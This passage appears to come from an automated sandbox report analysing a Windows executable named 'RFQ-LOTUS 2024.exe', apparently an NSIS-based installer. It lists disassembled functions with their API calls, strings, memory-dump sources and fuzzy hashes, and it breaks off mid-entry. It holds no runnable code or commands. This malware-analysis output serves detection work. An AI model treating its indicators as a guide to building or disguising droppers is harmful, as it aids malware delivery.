DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
lstrcatW.KERNEL32(007A3F28,\*.*), ref: 0040588F
lstrcatW.KERNEL32(?,0040A014), ref: 004058B2
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 004058B8
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 004058C8
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405968
FindClose.KERNEL32(00000000), ref: 00405977

Strings

\*.*, xrefs: 00405889
(?z, xrefs: 00405877
C:\Users\user\AppData\Local\Temp\, xrefs: 0040582B
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 0040581E

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3214930270
Opcode ID: 79936e2c09c2467da1847b8fcf84fb4c2ae0a6b28b626d6e6fcc789b16bbbf50
Instruction ID: 5c53005082933f3dff19d1f621f77edce462737186d9f3cfcfb8b04c389e649a
Opcode Fuzzy Hash: 79936e2c09c2467da1847b8fcf84fb4c2ae0a6b28b626d6e6fcc789b16bbbf50
Instruction Fuzzy Hash: 0941E671800A04FACB216B618C89BBF7678EF42729F24813BF801751C1D77C4996DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405D5C Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(007A55C0,NUL), ref: 00405D6B
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EEF,00000000,00000000), ref: 00405D8F
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405D98

Part of subcall function 00405B67: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000), ref: 00405B77
Part of subcall function 00405B67: lstrlenA.KERNEL32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA9

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405DB5
wsprintfA.USER32 ref: 00405DD3
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405E0E
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405E1D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405EAB
GlobalFree.KERNEL32(00000000), ref: 00405EBC
CloseHandle.KERNEL32(00000000), ref: 00405EC3

Part of subcall function 00405C02: GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405C06
Part of subcall function 00405C02: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405C28

Strings

NUL, xrefs: 00405D65
%ls=%ls, xrefs: 00405DC9
[Rename], xrefs: 00405E3D, 00405E4F

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
Instruction ID: 4bbe9f86b8adcb3ee4fdb7780e986b6535a4f1249b773ec96b367cc427070a1a
Opcode Fuzzy Hash: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
Instruction Fuzzy Hash: 8A312770600F147BD2202B718D49F6B3E6CEF41759F14003ABA81F62D2DA7CEA018EAD

Uniqueness

Uniqueness Score: -1.00%

Function 004062C1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406324
CharNextW.USER32(?,?,?,00000000), ref: 00406333
CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406338
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 0040634B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004062C2
*?|<>/":, xrefs: 00406313
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 004062C1

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-835663740
Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
Instruction ID: c327e11968ff1b61697d85eec455557f32973e7d313eb7c6419ca2acb5234ebd
Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
Instruction Fuzzy Hash: 9111C85580021295DB3037549D40AB7A7B8EF55754F52803FED86732C0E77C9C9286ED

Uniqueness

Uniqueness Score: -1.00%

Function 00404158 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404175
GetSysColor.USER32(00000000), ref: 00404191
SetTextColor.GDI32(?,00000000), ref: 0040419D
SetBkMode.GDI32(?,?), ref: 004041A9
GetSysColor.USER32(?), ref: 004041BC
SetBkColor.GDI32(?,?), ref: 004041CC
DeleteObject.GDI32(?), ref: 004041E6
CreateBrushIndirect.GDI32(?), ref: 004041F0

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: ea06b333114cee9cc67994af2ac871624958d76533ae86cbe2848aaafb465e30
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: 7E2196B1500704AFCB219F68EE0CB4B7BF8AF41710F04893DE995E66A0D734D944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(000C527A,00000064,000C5F00), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 6ea019a5c915e27d0383299d327640edd576fd3642c792e58a0fbb2247e90e0f
Instruction ID: 33f6bc0f9c66ffbc6f0a9480d788631f8e7fe4f3fd8502bd98e35746da28410b
Opcode Fuzzy Hash: 6ea019a5c915e27d0383299d327640edd576fd3642c792e58a0fbb2247e90e0f
Instruction Fuzzy Hash: 7701447064020DAFEF149F61DD49BAA3B69FB04304F00803AFA05A91D0DBB99955CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040565B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040569E
GetLastError.KERNEL32 ref: 004056B2
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056C7
GetLastError.KERNEL32 ref: 004056D1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405681
C:\Users\user\Desktop, xrefs: 0040565B

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
Instruction ID: dadfd0f85cedcb10ba49dc730fb6619fbbf26863a665bac08794baa5a138d59b
Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
Instruction Fuzzy Hash: F9010871D00219DBDF109FA0C9447EFBBB8EB14304F10443AE548F6280D77996148FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405AE9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A

Part of subcall function 00405A8C: CharNextW.USER32(?,?,007A4728,?,00405B00,007A4728,007A4728,?,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A9A
Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405A9F
Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405AB7

lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B42
GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B52

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405AE9
(Gz, xrefs: 00405AEF

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: (Gz$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-1408564994
Opcode ID: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
Instruction ID: 8ae2fce49526f5710a07790df8cd11e23799bcf3340ba248b926081ff081d995
Opcode Fuzzy Hash: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
Instruction Fuzzy Hash: 98F0F429104D5116C622763A1C4AEAF3564CF8236471A023FF852B22D2DF3CB953CCBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405EFA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Execute: ,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405F24
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405F45
RegCloseKey.ADVAPI32(?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405F68

Strings

Execute: , xrefs: 00405EFD

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Execute:
API String ID: 3677997916-3756222843
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 67c10a838693b4c4a2102f8098a5dbc089b4be67bb217fb13d6fb11fa6bedce4
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: D6015E3210020AEBCF218F25ED08EDB3BACEF44350F00403AF949D2120D735D964CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004059E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004059E7
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004059F1
lstrcatW.KERNEL32(?,0040A014), ref: 00405A03

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059E1

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

